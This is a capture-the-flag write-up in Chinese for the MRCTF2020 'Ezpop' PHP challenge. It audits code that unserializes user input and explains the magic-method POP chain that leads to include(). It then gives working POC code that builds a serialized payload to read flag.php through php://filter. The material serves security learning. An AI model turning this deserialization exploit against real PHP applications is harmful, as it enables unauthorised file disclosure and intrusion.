[MRCTF2020]Ezpop

简介: [MRCTF2020]Ezpop

代码审计

开局给出源码

1. Welcome to index.php
2. <?php
3. //flag is in flag.php
4. //WTF IS THIS?
5. //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
6. //And Crack It!
7. class Modifier {
8. protected  $var;
9. public function append($value){
10. include($value);
11.     }
12. public function __invoke(){
13. $this->append($this->var);
14.     }
15. }
16. 
17. class Show{
18. public $source;
19. public $str;
20. public function __construct($file='index.php'){
21. $this->source = $file;
22. echo 'Welcome to '.$this->source."<br>";
23.     }
24. public function __toString(){
25. return $this->str->source;
26.     }
27. 
28. public function __wakeup(){
29. if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
30. echo "hacker";
31. $this->source = "index.php";
32.         }
33.     }
34. }
35. 
36. class Test{
37. public $p;
38. public function __construct(){
39. $this->p = array();
40.     }
41. 
42. public function __get($key){
43. $function = $this->p;
44. return $function();
45.     }
46. }
47. 
48. if(isset($_GET['pop'])){
49.     @unserialize($_GET['pop']);
50. }
51. else{
52. $a=new Show;
53. highlight_file(__FILE__);
54. }

Modifier类中append()方法会将传入参数包含,而此处魔术方法__invoke中设置了将Modifier类中的var属性作为传入值来调用append()函数,所以在这里需要让属性var的值为flag.php,再触发魔术方法__invoke即可。魔术方法__invoke被自动调用的条件是类被当成一个函数被调用,故接着来寻找和函数调用有关的代码。

魔法函数__get中设置了属性p会被当做函数调用,刚好符合前面Modifier类中的要求。故需要再触发魔法函数__get即可,魔法函数__get会在访问类中一个不存在(或外部不可访问的私有)的属性时自动调用,那就需要寻找和调用属性相关的代码。

__toString中会返回属性str中的属性source,如果刚刚提到的source属性不存在,那么就符合了Test类中的要求,那这里。魔术方法__toString在类被当做一个字符串处理时会被自动调用,在魔术方法__wakeup则将属性source传入正则匹配函数preg_match(),在这个函数中source属性就被当做字符串处理。最终这个魔术方法__wakeup又在类被反序列化时自动调用。

 

本地测试

1. <?php
2. class Person{
3. /*封装私有成员属性*/
4. private $name='张三';private $sex='男';private $age=12;
5. /*__get()方法用来获取私有属性*/
6. function __get($property_name){
7. //        echo '在直接获取私有成员属性得时候,自动调用了这个__get()方法<br/>';
8. if(isset($this->$property_name))
9.         {
10. return ($this->$property_name);
11.         }else{
12. return NULL;
13.         }
14.     }
15. }
16. $p1=new Person();
17. /*直接获取私有属性得值,会自动调用__get()的方法,返回成员属性的值*/
18. echo '姓名:'.$p1->name.'<br/>'.PHP_EOL;
19. echo '性别:'.$p1->sex.'<br/>'.PHP_EOL;
20. echo '年龄:'.$p1->age.'<br/>'.PHP_EOL;
21. ?>

姓名:张三<br/>

性别:男<br/>

年龄:12<br/>

5.3.29下可以调用phpinfo

1. <?php
2. class Test{
3. private $p='phpinfo';
4. // public function __construct()
5. // {
6. //     $this->p = 'array';
7. // }
8. 
9. public function __get($key){
10. $function = $this->p;
11. return $function();
12.     }
13. }
14. $a=new Test;
15. echo $a->$p;
16. ?>

PHP Version 7.3.4可以调用以下PHPinfo

1. <?php
2. class Test{
3. private $p='phpinfo';
4. // public function __construct()
5. // {
6. //     $this->p = 'array';
7. // }
8. 
9. public function __get($key){
10. $function = $this->p;
11. return $function();
12.     }
13. }
14. $a=new Test;
15. $a->$eee;
16. ?>

PHP Version 7.3.4可以显示flag

1. <?php
2. class Modifier {
3. protected  $var='flag';
4. public function append($value){
5. include($value);
6.     }
7. public function __invoke(){
8. $this->append($this->var);
9.     }
10. }
11. $a=new Modifier;
12. $a->__invoke();
13. ?>

__invoke:以函数方法调用类时

1. <?php
2. 
3. class CallableClass
4. {
5. public function __invoke($param1, $param2)
6.     {
7. var_dump($param1,$param2);
8.     }
9. }
10. 
11. $obj  = new CallableClass;
12. $obj(123, 456);
13. 
14. // var_dump(is_callable($obj));

POC

调用过程

反序列化->调用Show类中魔术方法__wakeup->preg_match()函数对Show类的属性source处理->调用Show类中魔术方法__toString->返回Show类的属性str中的属性source(此时这里属性source并不存在)->调用Test类中魔术方法__get->返回Test类的属性p的函数调用结果->调用Modifier类中魔术方法__invoke->include()函数包含目标文件(flag.php)

1. <?php
2. class Modifier {
3. protected  $var='php://filter/convert.base64-encode/resource=flag.php';
4. public function append($value){
5. include($value);
6.     }
7. public function __invoke(){
8. $this->append($this->var);
9.     }
10. }
11. 
12. class Show{
13. public $source;
14. public $str;
15. public function __toString()
16.     {
17. return $this->str->source;
18.     }
19. public function __wakeup(){
20. if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
21. echo "hacker";
22. $this->source = "index.php";
23.         }
24.     }
25. }
26. class Test{
27. public $p;
28. public function __get($key){
29. $function = $this->p;
30. return $function();
31.     }
32. }
33. $a=new Show();
34. $d=new Show();
35. $a->source=$d;
36. $d->str=new Test();
37. ($d->str)->p=new Modifier();
38. 
39. 
40. 
41. echo urlencode(serialize($a))
42. ?>

最后的序列化结果进行url编码的原因:如果不进行编码,最后输出的结果是不全的,会有类显示异常的乱码,所以需要进行url编码

poc2

1. poc2:
2. $s = new Show();
3. $t = new Test();
4. $r = new Modifier();
5. $t->p = $r;
6. $s->str = $t;
7. $s->source = $s;

常用的类中魔法函数

__construct()//当一个对象创建时被调用

__destruct() //当一个对象销毁时被调用

__toString() //当一个对象被当作一个字符串使用

__sleep()//在对象在被序列化之前运行

__wakeup()//将在反序列化之后立即被调用(通过序列化对象元素个数不符来绕过)

__get()//获得一个类的成员变量时调用

__set()//设置一个类的成员变量时调用

__invoke()//调用函数的方式调用一个对象时的回应方法

__call()//当调用一个对象中的不能用的方法的时候就会执行这个函数

目录
相关文章
|
数据安全/隐私保护 Python
BUUCTF 传统知识+古典密码 1
BUUCTF 传统知识+古典密码 1
390 0
|
6月前
|
SQL Python
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解
|
6月前
|
存储 Rust 安全
Rust 中的引用与借用
Rust 中的引用与借用
|
数据安全/隐私保护 Windows
BUUCTF Windows系统密码 1
BUUCTF Windows系统密码 1
311 0
BUUCTF Windows系统密码 1
|
6月前
|
SQL 安全 JavaScript
【网络安全 | CatCTF】ezbypass-cat
【网络安全 | CatCTF】ezbypass-cat
340 0
|
6月前
BUUCTF 大白 1
BUUCTF 大白 1
86 0
|
11月前
|
安全 Shell PHP
wzsc_文件上传(条件竞争)
wzsc_文件上传(条件竞争)
209 0
|
安全 开发工具 git
[BJDCTF2020]Mark loves cat |变量覆盖(三解)
[BJDCTF2020]Mark loves cat |变量覆盖(三解)
161 0
|
Ubuntu
更改 wsl 中系统的安装位置
wsl 默认安装位置是C盘,众所周知C盘总是不够用的,所以才有了把 wsl 的系统迁移到其它位置的需求。
2677 0
|
SQL 安全 关系型数据库
[SWPUCTF 2021 新生赛]easy_sql
[SWPUCTF 2021 新生赛]easy_sql
318 0